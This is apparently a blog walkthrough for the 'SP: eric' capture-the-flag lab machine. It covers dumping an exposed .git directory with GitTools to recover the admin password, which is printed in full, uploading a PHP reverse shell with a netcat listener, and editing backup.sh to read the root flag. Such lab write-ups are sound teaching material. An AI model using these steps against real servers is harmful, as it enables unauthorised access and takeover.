CTF: SP: eric Walkthrough

      Nessun commento su CTF: SP: eric Walkthrough

Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve SP: eric machine.

Description

Eric is trying to reach out on the Internet, but is he following best practice?

Flags – /root/flag.txt – /home/eric/flag.txt

Tested with VirtualBox

DHCP enabled

Difficulty: Beginner

Should not be as easy as to just run a MSF module to get root right away, if so please let me know.

Doesn’t always get an IP address nicely with DHCP.

Information gathering

TCP Scanning

Dirb

GitTools

After testing the admin page I did understand that .git was the right way for getting some juicy info.

For our purpose, we are gonna use gittools

  • git clone https://github.com/internetwache/GitTools
  • cd GitTools
  • chmod +x gitdumper.sh
  • ./gitdumper.sh http://192.168.1.152/.git/ dest-dir

  • ./extractor.sh dest-dir/ dest-dir/

  • cd 2-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
  • examinate the admin.php file and bingo we found the password

  • USERNAME: admin
  • PASSWORD: st@mpch0rdt.ightiRu$glo0mappL3

Upload webshell

After logging in, we can upload a webshell

  • copy a web shell into local diretory: cp /usr/share/webshells/php/php-reverse-shell.php .
  • modify the ip
  • nc -nlvp 443
  • upload the file
  • 192.168.1.152/upload/php-reverse-shell.php
  • Bingo we have a revshell

Flag 1

  • cd /home/eric
  • cat flag.txt

Flag 2

  • nano backup.sh
  • cat /root/flag.txt

Fantastic we have completed the eric machine.